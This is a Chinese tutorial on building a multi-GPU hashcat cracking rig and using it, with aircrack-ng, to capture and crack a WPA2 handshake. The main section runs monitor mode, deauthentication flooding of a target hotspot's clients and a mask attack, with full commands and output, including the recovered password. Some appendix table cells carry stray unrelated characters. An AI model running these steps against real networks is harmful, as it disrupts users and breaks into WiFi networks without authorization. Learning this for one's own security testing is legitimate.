Ubuntu18.04+8x1080ti爆破環(huán)境從零搭建

硬件環(huán)境:

主機: TYAN FT77D-B7109

CPU: Intel Xeon Scalable Processor

GPU: 1080Ti x 8 (測試時只用了兩塊, 分別是MSI/技嘉)

內(nèi)存: 32G

硬盤: 1T SSD

0x00 配置環(huán)境

0x01 安裝系統(tǒng)

目標(biāo)系統(tǒng): Ubuntu 18.04.1 LTS Desktop (建議安裝Server版)

在官網(wǎng)下載好啟動盤之后, 用燒錄工具(建議用win32diskimager)寫入U盤, 然后進入啟動項選為U盤啟動, 接下來開始安裝, 一路默認配置就好. 具體步驟請谷歌, 這里就不贅述了. (這里我們遇到一個坑, 就是插了PCIE網(wǎng)卡之后安裝系統(tǒng)一直重啟, 可能是主機的兼容性問題, 裝系統(tǒng)的時候如果條件允許, 最好把所有的外置設(shè)備卸載掉)

0x02 安裝GPU驅(qū)動

  1. 安裝好系統(tǒng)之后, 可以配置一下更新源(/etc/apt/sources.list,我用的是中科大源), update一下系統(tǒng).

    deb https://mirrors.ustc.edu.cn/ubuntu/ bionic main restricted universe multiverse
    deb-src https://mirrors.ustc.edu.cn/ubuntu/ bionic main restricted universe multiverse
    deb https://mirrors.ustc.edu.cn/ubuntu/ bionic-updates main restricted universe multiverse
    deb-src https://mirrors.ustc.edu.cn/ubuntu/ bionic-updates main restricted universe multiverse
    deb https://mirrors.ustc.edu.cn/ubuntu/ bionic-backports main restricted universe multiverse
    deb-src https://mirrors.ustc.edu.cn/ubuntu/ bionic-backports main restricted universe multiverse
    deb https://mirrors.ustc.edu.cn/ubuntu/ bionic-security main restricted universe multiverse
    deb-src https://mirrors.ustc.edu.cn/ubuntu/ bionic-security main restricted universe multiverse
    deb https://mirrors.ustc.edu.cn/ubuntu/ bionic-proposed main restricted universe multiverse
    deb-src https://mirrors.ustc.edu.cn/ubuntu/ bionic-proposed main restricted universe multiverse
    
    sudo apt-get update && apt-get upgrade
    sudo apt-get install gcc make p7zip-full git lsb-core
    
  2. 然后將Nouveau(NVIDIA通用顯卡驅(qū)動)禁用:

    sudo bash -c "echo blacklist nouveau > /etc/modprobe.d/blacklist-nvidia-nouveau.conf"
    sudo bash -c "echo options nouveau modeset=0 >> /etc/modprobe.d/blacklist-nvidia-nouveau.conf"
    sudo update-initramfs -u
    sudo reboot
    
  3. 等重啟之后, 再添加32位的NVIDIA驅(qū)動源:

    sudo dpkg --add-architecture i386
    sudo apt-get update
    sudo apt-get install build-essential libc6:i386
    
  4. 在官網(wǎng)下載驅(qū)動, 下載好之后:

    chmod +x NVIDIA*.run
    sudo ./NVIDIA*.run
    sudo reboot
    

    或者:

    wget http://us.download.nvidia.com/XFree86/Linux-x86_64/375.26/NVIDIA-Linux-x86_64-375.26.run
    chmod +x NVIDIA-Linux-x86_64-375.26.run
    sudo ./NVIDIA-Linux-x86_64-375.26.run
    
  5. (可選步驟)安裝CPU集成顯卡驅(qū)動:

    wget http://registrationcenter-download.intel.com/akdlm/irc_nas/9019/opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25.tgz
    tar -xvf opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25.tgz
    cd opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25
    ./install.sh 
    
  6. 這時候可以看一下顯卡配置:

    lspci | grep VGA
    

0x03 安裝hashcat

wget https://hashcat.net/files/hashcat-3.30.7z
7z x hashcat-3.30.7z
cd hashcat-3.30

這是個比較老的版本, 我用的aircrack跑出來的包用這個版本可以跑. 如果想嘗一下鮮也可以:

wget https://hashcat.net/files/hashcat-4.2.1.7z

順便測試一下速度(在解壓后的目錄里直接運行./example0.sh即可):

Session..........: hashcat
Status...........: Bypass
Hash.Type........: MD5
Hash.Target......: example0.hash
Time.Started.....: Sat Oct 20 20:08:33 2018 (27 mins, 0 secs)
Time.Estimated...: Sat Oct 20 22:31:24 2018 (1 hour, 55 mins)
Guess.Base.......: File (example.dict), Right Side
Guess.Mod........: Mask (?a?a?a?a?a?a) [6], Left Side
Guess.Queue.Base.: 1/1 (100.00%)
Guess.Queue.Mod..: 1/1 (100.00%)
Speed.Dev.#2.....:  8340.3 MH/s (6.61ms) @ Accel:128 Loops:64 Thr:256 Vec:1
Speed.Dev.#3.....:  7938.7 MH/s (6.93ms) @ Accel:128 Loops:64 Thr:256 Vec:1
Speed.Dev.#*.....: 16279.0 MH/s
Recovered........: 3035/6494 (46.74%) Digests, 0/1 (0.00%) Salts
Recovered/Time...: CUR:25,N/A,N/A AVG:29,1773,42558 (Min,Hour,Day)
Progress.........: 26411945426944/139573552218112 (18.92%)
Rejected.........: 0/26411945426944 (0.00%)
Restore.Point....: 200933376/1073741824 (18.71%)
Candidates.#2....: sarusix102x -> 6o9momx49wy3c2
Candidates.#3....: sarseeethelia3 -> 6o9602eugeni
HWMon.Dev.#2.....: Temp: 79c Fan: 62% Util: 94% Core:1860MHz Mem:5005MHz Bus:16
HWMon.Dev.#3.....: Temp: 84c Fan: 78% Util: 94% Core:1771MHz Mem:5005MHz Bus:16

Started: Sat Oct 20 20:08:26 2018
Stopped: Sat Oct 20 20:35:35 2018
  • 關(guān)于上面輸出的參數(shù)解析:

    實際上example0.sh的命令如下:
    ./hashcat64.bin -t 32 -a 7 example0.hash ?a?a?a?a example.dict
    
    Session..........:
    Status...........: 
    Hash.Type........: 表示哈希計算的類型
    Hash.Target......: 表示目標(biāo)哈希表
    Time.Started.....: 計算開始時間
    Time.Estimated...: 估計結(jié)束時間
    Guess.Base.......: 密碼字典
    Guess.Mod........: 密碼類型(大小寫/數(shù)字等)
    Guess.Queue.Base.:
    Guess.Queue.Mod..:
    Speed.Dev.#2.....: 顯卡1的速度(8340.0MH/s 約等于每秒83億次運算)
    Speed.Dev.#3.....: 顯卡2...
    Speed.Dev.#*.....: 總速度
    Recovered........: 
    Recovered/Time...: 當(dāng)前已用時間(分,時,天); 平均需要時間(分,時,天)
    Progress.........: 當(dāng)前進度
    Rejected.........: 應(yīng)該是丟包率(猜的)
    Restore.Point....: 當(dāng)前的進度
    Candidates.#2....: 即將嘗試爆破的密碼(猜的)
    Candidates.#3....: 
    HWMon.Dev.#2.....: Temp表示當(dāng)前顯卡溫度;Fan表示風(fēng)扇轉(zhuǎn)速;Men內(nèi)存頻率
    HWMon.Dev.#3.....: Util表示內(nèi)存使用率;Core表示GPU核頻率;Bus通道數(shù)
    
  • 關(guān)于hashcat命令參數(shù)解析(詳見附錄一):

    -a  指定要使用的破解模式
    -m  指定要破解的hash類型所對應(yīng)的id[下面有一份完整的hash id對照表],幾乎現(xiàn)在市面上常用的一些散列類型它都支持,而且每個版本更新都會增加一些新的算法
    -o  指定破解成功后的hash及所對應(yīng)的明文密碼的存放位置,可以用它把破解成功的hash寫到指定的文件中
    --force   忽略破解過程中的警告信息,跑單條hash可能需要加上此選項
    --show    顯示已經(jīng)破解的hash及該hash所對應(yīng)的明文
    --increment    啟用增量破解模式,你可以利用此模式讓hashcat在指定的密碼長度范圍內(nèi)執(zhí)行破解過程,其實,并不建議這么用,因為破解時間可能會比較長
    --increment-min  密碼最小長度,后面直接等于一個整數(shù)即可,配置increment模式一起使用
    --increment-max  密碼最大長度,同上
    --outfile-format 指定破解結(jié)果的輸出格式id,一般自己常用3
    --username     忽略hash文件中的指定的用戶名,在破解win和linux系統(tǒng)用戶密碼hash可能會用到
    --remove   刪除已被破解成功的hash
    -r         使用自定義破解規(guī)則,這個后期抽空再說吧,比較的復(fù)雜,不是一兩句話能說完的
    
  • 真實爆破WiFi密碼情況系hashcat參數(shù)解析:

    ./hashcat64.bin -m 2500 -a 3 wpahash.hccap ?l?l?l?l?l?l?l?l
    

    -m : hash的類型, 2500代表的是WPA/WPA2協(xié)議. 詳見[② Hash種類](② Hash種類)

    -a: 有多種參數(shù), 3表示窮舉. 詳見[⑤ 攻擊模式](#⑤ 攻擊模式)

    *.hccap: 即為aircrack抓到的包之后轉(zhuǎn)化而來的

    ?l: 表示所有的小寫字母. 詳見[⑥ 內(nèi)置字符集](⑥ 內(nèi)置字符集)

0x10 Crack實戰(zhàn)

0x11 初始配置

  1. 首先需要找一個可以監(jiān)聽注入的USB網(wǎng)卡, 如果筆記本自帶網(wǎng)卡能用就更好了. 這里以rt2800usb為例講解:

    root@ks:/home/ks# airmon-ng 
    
    PHY  Interface   Driver      Chipset
    
    phy0 wlp3s0      iwlwifi     Intel Corporation Device 24fb (rev 10)
    phy1 wlx7cdd90f1f416 rt2800usb   Ralink Technology, Corp. RT2870/RT3070
    

    可以看到, 有兩張網(wǎng)卡, wlp3s0是筆記本自帶的英特爾系列網(wǎng)卡; lx7cdd90f1f416是能夠監(jiān)聽的新插入的usb網(wǎng)卡.

  2. 查看網(wǎng)卡狀態(tài), 兩張網(wǎng)卡的Mode都是Managed:

    root@ks:/home/ks# iwconfig
    wlx7cdd90f1f416  IEEE 802.11  ESSID:off/any  
    Mode:Managed  Access Point: Not-Associated   Tx-Power=off   
    Retry short  long limit:2   RTS thr:off   Fragment thr:off
    Encryption key:off
    Power Management:off
    lo        no wireless extensions.
    wlp3s0    IEEE 802.11  ESSID:off/any  
    Mode:Managed  Access Point: Not-Associated   Tx-Power=off   
    Retry short limit:7   RTS thr:off   Fragment thr:off
    Encryption key:off
    Power Management:on
    enp2s0    no wireless extensions.
    enp0s20f0u1  no wireless extensions.
    
  3. 為了避免沖突, 先殺占用進程

    root@ks:/home/ks# airmon-ng check kill
    
    Killing these processes:
    
      PID Name
      891 wpa_supplicant
     3091 dhclient
     4430 avahi-daemon
     4431 avahi-daemon
    
  4. 然后將能夠抓包的網(wǎng)卡的Mode設(shè)為Monitor

    root@ks:/home/ks# airmon-ng start wlx7cdd90f1f416
    
    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to run 'airmon-ng check kill'
    
      PID Name
     7674 avahi-daemon
     7675 avahi-daemon
    
    PHY  Interface   Driver      Chipset
    
    phy0 wlp3s0      iwlwifi     Intel Corporation Device 24fb (rev 10)
    phy4 wlx7cdd90f1f416 rt2800usb   Ralink Technology, Corp. RT2870/RT3070
     wlx7cdd90f1f416 is soft blocked, please run "rfkill unblock wlx7cdd90f1f416" to use this interface.
    rfkill error, unable to start wlx7cdd90f1f416
    
    Would you like to try and automatically resolve this? [y/n] y
    rfkill error: rfkill: invalid identifier: 4
    Unable to unblock.
    Interface 15mon is too long for linux so it will be renamed to the old style (wlan#) name.
    
         (mac80211 monitor mode vif enabled on [phy4]wlan0mon
         (mac80211 station mode vif disabled for [phy4]wlx7cdd90f1f416)
    
  5. 此時再看一下無線網(wǎng)卡狀態(tài):

    root@ks:/home/ks# iwconfig
    lo        no wireless extensions.
    
    wlp3s0    IEEE 802.11  ESSID:off/any  
              Mode:Managed  Access Point: Not-Associated   Tx-Power=0 dBm   
              Retry short limit:7   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:on
              
    wlan0mon  IEEE 802.11  Mode:Monitor  Tx-Power=off   
              Retry short  long limit:2   RTS thr:off   Fragment thr:off
              Power Management:off
              
    enp2s0    no wireless extensions.
    
    enp0s20f0u1  no wireless extensions.
    

    已更改~

0x12 實施攻擊

  1. 我們的攻擊目標(biāo)是iPhone:

    root@ks:/home/ks# airodump-ng wlan0mon
    

上圖可看到它的mac是74:D2:1D:AE:3F:94, 信道(CH)是1. (記住這兩個信息下面有用)

  1. 接下來我們開兩個shell, 一個shell負責(zé)監(jiān)聽握手包, 另一個shell負責(zé)洪荒攻擊兩個正常連接的WiFi設(shè)備, 我們先看看第一個shell:

    airodump-ng --bssid 74:D2:1D:AE:3F:94 -c 1 -w test wlan0mon
    

可以看出來已經(jīng)抓到了握手包703個. 對命令參數(shù)解釋如下:

--bssid: 表示W(wǎng)iFi熱點的mac

-c: 表示信道1

-w: 后面跟著文件名

wlan0mon: 需要監(jiān)聽的網(wǎng)卡

  1. 開啟了監(jiān)聽之后, 我們就需要DDoS目標(biāo)連接了, 這時候在另一個shell輸入如下命令:

    aireplay-ng --deauth 5 -a 74:D2:1D:AE:3F:94 wlan0mon
    

    隔幾秒發(fā)一次, 以抓到足夠的握手包, 減少爆破的時間.

0x20 開始爆破

在上面操作的監(jiān)聽過程中, 會在當(dāng)前路徑下保存一個抓到的握手包的數(shù)據(jù), 但這個流量包還不能直接讓hashcat跑, 需要做簡單的處理, 先做一個簡單的數(shù)據(jù)清洗:

root@ks:~/crack_packet_wifi# wpaclean wpapass.cap test-05.cap 
Pwning test-05.cap (1/1 100%)
Net 74:d2:1d:ae:3f:94 iPhone
Done

可以看到, 已經(jīng)成功識別出目標(biāo)無限的mac. 接下來我們吧數(shù)據(jù)包轉(zhuǎn)換成hashcat能夠識別的hash類型:

root@ks:/home/ks/software/crack_pw/crack_packet_wifi# aircrack-ng wpapass.cap -J wpahash
Opening wpapass.cap
Read 3 packets.

   #  BSSID              ESSID                     Encryption

   1  74:D2:1D:AE:3F:94  iPhone                    WPA (1 handshake)

Choosing first network as target.
Opening wpapass.cap
Reading packets, please wait...
Building Hashcat (1.00) file...
[*] ESSID (length: 6): iPhone
[*] Key version: 2
[*] BSSID: 74:D2:1D:AE:3F:94
[*] STA: 88:C9:D0:B7:2C:36
[*] anonce:
    E6 A3 D9 3C 95 77 3E 0B 5D 84 CE 65 0D 1C EB 59 
    E4 E4 E3 A5 3A 07 FE D8 47 A1 7C 77 10 66 DC E4 
[*] snonce:
    03 8D 9F 6B A8 4B 27 7D 8E 02 57 56 34 D9 98 2A 
    4D 36 1C EA 2D 6A 91 43 4F 30 67 96 81 14 F4 AD 
[*] Key MIC:
    21 51 2B 3C 6F 37 CA 9E 09 6C 92 74 45 DC DA 11
[*] eapol:
    01 03 00 75 02 01 0A 00 00 00 00 00 00 00 00 00 
    03 03 8D 9F 6B A8 4B 27 7D 8E 02 57 56 34 D9 98 
    2A 4D 36 1C EA 2D 6A 91 43 4F 30 67 96 81 14 F4 
    AD 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    00 00 16 30 14 01 00 00 0F AC 04 01 00 00 0F AC 
    04 01 00 00 0F AC 02 80 00 
Successfully written to wpahash.hccap
Quitting aircrack-ng...

接下來就是直接放到爆破的服務(wù)器上跑(實測用最新版的hashcat跑不了, 這里用了3.30版本的hashcat)

./hashcat64.bin -m 2500 -a 3 wpahash.hccap ?d?d?d?d?d?d?d?d

幾秒鐘就跑出來了:

?```
Session..........: hashcat
Status...........: Running
Hash.Type........: WPA/WPA2
Hash.Target......: iPhone (74:d2:1d:ae:3f:94 <-> 88:c9:d0:b7:2c:36)
Time.Started.....: Tue Oct 23 17:43:18 2018 (3 secs)
Time.Estimated...: Tue Oct 23 17:44:52 2018 (1 min, 31 secs)
Input.Mask.......: ?d?d?d?d?d?d?d?d [8]
Input.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:   535.2 kH/s (6.23ms)
Speed.Dev.#3.....:   527.7 kH/s (6.34ms)
Speed.Dev.#*.....:  1062.9 kH/s
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 2207744/100000000 (2.21%)
Rejected.........: 0/2207744 (0.00%)
Restore.Point....: 0/10000000 (0.00%)
Candidates.#2....: 42345678 -> 41875555
Candidates.#3....: 40689823 -> 49471088
HWMon.Dev.#2.....: Temp: 41c Fan: 29% Util: 97% Core:1860Mhz Mem:5005Mhz Lanes:16
HWMon.Dev.#3.....: Temp: 41c Fan:  0% Util: 97% Core:1809Mhz Mem:5005Mhz Lanes:16

iPhone:74d21dae3f94:88c9d0b72c36:67854312                 

假設(shè)我們把它設(shè)置成全字符爆破, 也就是:

./hashcat64.bin -m 2500 -a 3 wpahash.hccap ?a?a?a?a?a?a?a?a

則需要幾百年(可見, 如果知道WiFi密碼的字符組成結(jié)構(gòu), 也就成功了一半了):

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA/WPA2
Hash.Target......: iPhone (74:d2:1d:ae:3f:94 <-> 88:c9:d0:b7:2c:36)
Time.Started.....: Tue Oct 23 17:53:33 2018 (31 secs)
Time.Estimated...: Fri Dec 24 03:40:44 2021 (200 years, 198 days)
Input.Mask.......: ?a?a?a?a?a?a?a?a [8]
Input.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:   531.0 kH/s (6.38ms)
Speed.Dev.#3.....:   517.3 kH/s (6.52ms)
Speed.Dev.#*.....:  1048.3 kH/s
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 31854592/6634204312890625 (0.00%)
Rejected.........: 0/31854592 (0.00%)
Restore.Point....: 0/69833729609375 (0.00%)
Candidates.#2....: E]_LINAN -> E;$.1988
Candidates.#3....: Narinane -> N"XZANAN
HWMon.Dev.#2.....: Temp: 66c Fan: 47% Util: 97% Core:1809Mhz Mem:5005Mhz Lanes:16
HWMon.Dev.#3.....: Temp: 65c Fan: 34% Util: 97% Core:1759Mhz Mem:5005Mhz Lanes:16

參考鏈接

  1. How to build a 8 GPU password cracker
  2. Running HashCat on Ubuntu 18.04 Server with 1080TI
  3. How to Build a Password Cracker with NVidia GTX 1080TI & GTX 1070
  4. 快速破解各種散列hash hashcat入門篇
  5. aircrack & hashcat 非字典高速破解目標(biāo)無線密碼
  6. 用hashcat超速破解WiFi密碼
  7. 開源GPU密碼破解工具–HashCat
  8. hashcat 幫助文件 中文翻譯
  9. Hashcat用戶手冊——直接攻擊模式的使用

附錄一

① hashcat選項解釋

用法:

hashcat [選項]... hash|hash文件|hccapx文件 [字典|掩碼|目錄]...
選項 縮寫 / 原文 參數(shù)類型 描述 用例
-m,--hash-type 數(shù)字 Hash種類,參見下面的參考 -m 1000
-a,--attack-mode 數(shù)字 攻擊模式悟狱,參見下面的參考 -a 3
-V,--version 輸出版本信息
-h,--help 輸出幫助信息
--quiet 禁用輸出
--hex-charset 字符集以十六進制形式給出
--hex-salt 鹽以十六進制形式給出
--hex-wordlist 字典中的單詞是以十六進制形式給出的
--force 忽略警告
--status 自動更新屏幕
--status-timer 數(shù)字 設(shè)置自動更新屏幕間隔為X秒 --status-timer=1
--machine-readable 以機器可讀格式顯示狀態(tài)視圖
--keep-guessing 被破解之后繼續(xù)猜測Hash
--loopback 在induction目錄中加入新的純文本文件
--weak-hash-threshold 數(shù)字 當(dāng)閾值為X時停止檢查弱Hash --weak=0
--markov-hcstat 文件 指定要使用的hcstat文件 --markov-hc=my.hcstat
--markov-disable 禁用馬爾可夫鏈,模仿經(jīng)典暴力破解
--markov-classic 啟用經(jīng)典馬爾可夫鏈,無任何位置
-t,--markov-threshold 數(shù)字 當(dāng)閾值X時停止接收新的馬爾科夫鏈 -t 50
--runtime 數(shù)字 運行X秒后中止會話 --runtime=10
--session 字符串 定義具體的會話名稱 --session=mysession
--restore 從--session恢復(fù)會話
--restore-disable 不寫入恢復(fù)文件
--restore-file-path 文件 指定恢復(fù)文件的路徑 --restore-file-path=my.restore
-o,--outfile 文件 定義恢復(fù)的Hash的輸出文件 -o outfile.txt
--outfile-format 數(shù)字 定義恢復(fù)的Hash的輸出格式绅络,參見下面的參考 --outfile-format=7
--outfile-autohex-disable 在輸出純文本文件中禁用$HEX[]
--outfile-check-timer 數(shù)字 設(shè)置輸出文件檢查間隔為X秒 --outfile-check=30
-p,--separator 字符 Hash表和輸出文件的分隔符 -p :
--stdout 不破解Hash挨队,只打印候選值
--show 比較Hash表和pot文件弧可,顯示已破解的Hash
--left 比較Hash表和pot文件蔑匣,顯示未破解的Hash
--username 忽略Hash文件中的用戶名
--remove 一旦破解,就刪除Hash
--remove-timer 數(shù)字 每X秒更新輸入的Hash文件 --remove-timer=30
--potfile-disable 不寫入pot文件
--potfile-path 目錄 指定pot文件的路徑 --potfile-path=my.pot
--debug-mode 數(shù)字 定義調(diào)試模式(僅通過使用規(guī)則進行混合) --debug-mode=4
--debug-file 文件 調(diào)試規(guī)則的輸出文件 --debug-file=good.log
--induction-dir 目錄 指定loopback的induction目錄 --induction=inducts
--outfile-check-dir 目錄 指定監(jiān)控純文本文件的輸出目錄 --outfile-check-dir=x
--logfile-disable 禁用日志文件
--hccapx-message-pair 數(shù)字 只從hccapx加載匹配X的消息對 --hccapx-message-pair=2
--nonce-error-corrections 數(shù)字 用BF大小范圍來取代AP最后字節(jié)的隨機數(shù) --nonce-error-corrections=16
--truecrypt-keyfiles 文件 要使用的密匙文件棕诵,用逗號分隔 --truecrypt-key=x.png
--veracrypt-keyfiles 文件 要使用的密匙文件裁良,用逗號分隔 --veracrypt-key=x.txt
--veracrypt-pim 數(shù)字 VeraCrypt的頭部密鑰生成的迭代次數(shù)(PIM) --veracrypt-pim=1000
-b,--benchmark 運行基準(zhǔn)測試
--speed-only 返回預(yù)期的攻擊速度,然后退出
--progress-only 返回理想進度的步驟大小和處理時間
-c,--segment-size 數(shù)字 為wordfile設(shè)置 X MB緩存 -c 32
--bitmap-min 數(shù)字 設(shè)置位圖最小為X位(bit) --bitmap-min=24
--bitmap-max 數(shù)字 設(shè)置位圖最大為X位(bit) --bitmap-max=24
--cpu-affinity 字符串 設(shè)置CPU相關(guān)性年鸳,用逗號分隔 --cpu-affinity=1,2,3
-I,--opencl-info 顯示檢測到的OpenCL平臺/設(shè)備的信息 -I
--opencl-platforms 字符串 要使用的OpenCL平臺趴久,用逗號分隔 --opencl-platforms=2
-d,--opencl-devices 字符串 要使用的OpenCL設(shè)備丸相,用逗號分隔 -d 1
-D,--opencl-device-types 字符串 要使用的OpenCL設(shè)備類型搔确,用逗號分隔 -D 1
--opencl-vector-width 數(shù)字 手動覆蓋OpenCL矢量寬度為X --opencl-vector=4
-w,--workload-profile 數(shù)字 設(shè)置工作負載配置文件,參見下面的參考 -w 3
-n,--kernel-accel 數(shù)字 手動調(diào)整工作負載灭忠,將外圈步長設(shè)置為X -n 64
-u,--kernel-loops 數(shù)字 手動調(diào)整工作負載膳算,將內(nèi)圈步長設(shè)置為X -u 256
--nvidia-spin-damp 數(shù)字 可變通NVIDIA處理器熱循環(huán)Bug,用百分比表示 --nvidia-spin-damp=50
--gpu-temp-disable 禁用GPU溫度和風(fēng)扇速度的讀取和觸發(fā)
--gpu-temp-abort 數(shù)字 如果GPU溫度達到X攝氏度弛作,則中止 --gpu-temp-abort=100
--gpu-temp-retain 數(shù)字 嘗試將GPU溫度保持在X攝氏度 --gpu-temp-retain=95
--powertune-enable 啟用電源調(diào)整涕蜂。 完成后恢復(fù)設(shè)置
--scrypt-tmto 數(shù)字 手動覆蓋scrypt的TMTO值為X --scrypt-tmto=3
-s,--skip 數(shù)字 跳過前X個單詞 -s 1000000
-l,--limit 數(shù)字 跳過單詞后限制X個單詞 -l 1000000
--keyspace 顯示密鑰空間base:mod值后退出
-j,--rule-left 規(guī)則 單個規(guī)則應(yīng)用于字典中左側(cè)的每個單詞 -j 'c'
-k,--rule-right 規(guī)則 單個規(guī)則應(yīng)用于字典中右側(cè)的每個單詞 -k '^-'
-r,--rules-file 文件 多個規(guī)則應(yīng)用于字典中的每個單詞 -r rules/best64.rule
-g,--generate-rules 數(shù)字 生成X個隨機規(guī)則 -g 10000
--generate-rules-func-min 數(shù)字 強制每個規(guī)則最小X個函數(shù)
--generate-rules-func-max 數(shù)字 強制每個規(guī)則最大X個函數(shù)
--generate-rules-seed 數(shù)字 強制RNG種子設(shè)置為X
-1,--custom-charset1 字符集 用戶定義的字符集 ?1 -1 ?l?d?u
-2,--custom-charset2 字符集 用戶定義的字符集 ?2 -2 ?l?d?s
-3,--custom-charset3 字符集 用戶定義的字符集 ?3
-4,--custom-charset4 字符集 用戶定義的字符集 ?4
-i,--increment 啟用掩碼增量模式
--increment-min 數(shù)字 在X處開始掩碼遞增 --increment-min=4
--increment-max 數(shù)字 在X處停止掩碼遞增 --increment-max=8

② Hash種類

編號 名稱 類別
900 MD4 純Hash
0 MD5 純Hash
5100 Half MD5 純Hash
100 SHA1 純Hash
1300 SHA-224 純Hash
1400 SHA-256 純Hash
10800 SHA-384 純Hash
1700 SHA-512 純Hash
5000 SHA-3 (Keccak) 純Hash
10100 SipHash 純Hash
6000 RIPEMD-160 純Hash
6100 Whirlpool 純Hash
6900 GOST R 34.11-94 純Hash
11700 GOST R 34.11-2012 (Streebog) 256-bit 純Hash
11800 GOST R 34.11-2012 (Streebog) 512-bit 純Hash
10 md5(pass.salt) 純Hash,鹽 且/或 多次迭代
20 md5(salt.pass) 純Hash映琳,鹽 且/或 多次迭代
30 md5(unicode(pass).salt) 純Hash机隙,鹽 且/或 多次迭代
40 md5(salt.unicode(pass)) 純Hash蜘拉,鹽 且/或 多次迭代
3800 md5(salt.pass.$salt) 純Hash,鹽 且/或 多次迭代
3710 md5(salt.md5(pass)) 純Hash有鹿,鹽 且/或 多次迭代
4010 md5(salt.md5(salt.$pass)) 純Hash旭旭,鹽 且/或 多次迭代
4110 md5(salt.md5(pass.$salt)) 純Hash,鹽 且/或 多次迭代
2600 md5(md5($pass)) 純Hash葱跋,鹽 且/或 多次迭代
3910 md5(md5(pass).md5(salt)) 純Hash持寄,鹽 且/或 多次迭代
4300 md5(strtoupper(md5($pass))) 純Hash,鹽 且/或 多次迭代
4400 md5(sha1($pass)) 純Hash娱俺,鹽 且/或 多次迭代
110 sha1(pass.salt) 純Hash稍味,鹽 且/或 多次迭代
120 sha1(salt.pass) 純Hash,鹽 且/或 多次迭代
130 sha1(unicode(pass).salt) 純Hash荠卷,鹽 且/或 多次迭代
140 sha1(salt.unicode(pass)) 純Hash模庐,鹽 且/或 多次迭代
4500 sha1(sha1($pass)) 純Hash,鹽 且/或 多次迭代
4520 sha1(salt.sha1(pass)) 純Hash油宜,鹽 且/或 多次迭代
4700 sha1(md5($pass)) 純Hash赖欣,鹽 且/或 多次迭代
4900 sha1(salt.pass.$salt) 純Hash,鹽 且/或 多次迭代
14400 sha1(CX) 純Hash验庙,鹽 且/或 多次迭代
1410 sha256(pass.salt) 純Hash顶吮,鹽 且/或 多次迭代
1420 sha256(salt.pass) 純Hash,鹽 且/或 多次迭代
1430 sha256(unicode(pass).salt) 純Hash粪薛,鹽 且/或 多次迭代
1440 sha256(salt.unicode(pass)) 純Hash悴了,鹽 且/或 多次迭代
1710 sha512(pass.salt) 純Hash,鹽 且/或 多次迭代
1720 sha512(salt.pass) 純Hash违寿,鹽 且/或 多次迭代
1730 sha512(unicode(pass).salt) 純Hash湃交,鹽 且/或 多次迭代
1740 sha512(salt.unicode(pass)) 純Hash,鹽 且/或 多次迭代
50 HMAC-MD5 (key = $pass) 純Hash藤巢,認證的
60 HMAC-MD5 (key = $salt) 純Hash搞莺,認證的
150 HMAC-SHA1 (key = $pass) 純Hash,認證的
160 HMAC-SHA1 (key = $salt) 純Hash掂咒,認證的
1450 HMAC-SHA256 (key = $pass) 純Hash才沧,認證的
1460 HMAC-SHA256 (key = $salt) 純Hash,認證的
1750 HMAC-SHA512 (key = $pass) 純Hash绍刮,認證的
1760 HMAC-SHA512 (key = $salt) 純Hash温圆,認證的
14000 DES (PT = salt, key =pass) 純加密,已知的明文攻擊
14100 3DES (PT = salt, key =pass) 純加密孩革,已知的明文攻擊
14900 Skip32 (PT = salt, key =pass) 純加密岁歉,已知的明文攻擊
400 phpass 通用密鑰導(dǎo)出函數(shù)(KDF)
8900 scrypt 通用密鑰導(dǎo)出函數(shù)(KDF)
11900 PBKDF2-HMAC-MD5 通用密鑰導(dǎo)出函數(shù)(KDF)
12000 PBKDF2-HMAC-SHA1 通用密鑰導(dǎo)出函數(shù)(KDF)
10900 PBKDF2-HMAC-SHA256 通用密鑰導(dǎo)出函數(shù)(KDF)
12100 PBKDF2-HMAC-SHA512 通用密鑰導(dǎo)出函數(shù)(KDF)
23 Skype 網(wǎng)絡(luò)協(xié)議
2500 WPA/WPA2 網(wǎng)絡(luò)協(xié)議
4800 iSCSI CHAP authentication, MD5(CHAP) 網(wǎng)絡(luò)協(xié)議
5300 IKE-PSK MD5 網(wǎng)絡(luò)協(xié)議
5400 IKE-PSK SHA1 網(wǎng)絡(luò)協(xié)議
5500 NetNTLMv1 網(wǎng)絡(luò)協(xié)議
5500 NetNTLMv1+ESS 網(wǎng)絡(luò)協(xié)議
5600 NetNTLMv2 網(wǎng)絡(luò)協(xié)議
7300 IPMI2 RAKP HMAC-SHA1 網(wǎng)絡(luò)協(xié)議
7500 Kerberos 5 AS-REQ Pre-Auth etype 23 網(wǎng)絡(luò)協(xié)議
8300 DNSSEC (NSEC3) 網(wǎng)絡(luò)協(xié)議
10200 CRAM-MD5 網(wǎng)絡(luò)協(xié)議
11100 PostgreSQL CRAM (MD5) 網(wǎng)絡(luò)協(xié)議
11200 MySQL CRAM (SHA1) 網(wǎng)絡(luò)協(xié)議
11400 SIP digest authentication (MD5) 網(wǎng)絡(luò)協(xié)議
13100 Kerberos 5 TGS-REP etype 23 網(wǎng)絡(luò)協(xié)議
121 SMF (Simple Machines Forum) > v1.1 論壇,內(nèi)容管理系統(tǒng)(CMS)膝蜈,電子商務(wù)锅移,框架
400 phpBB3 (MD5) 論壇熔掺,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)非剃,框架
2611 vBulletin < v3.8.5 論壇瞬女,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)努潘,框架
2711 vBulletin >= v3.8.5 論壇诽偷,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)疯坤,框架
2811 MyBB 1.2+ 論壇报慕,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)压怠,框架
2811 IPB2+ (Invision Power Board) 論壇眠冈,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)菌瘫,框架
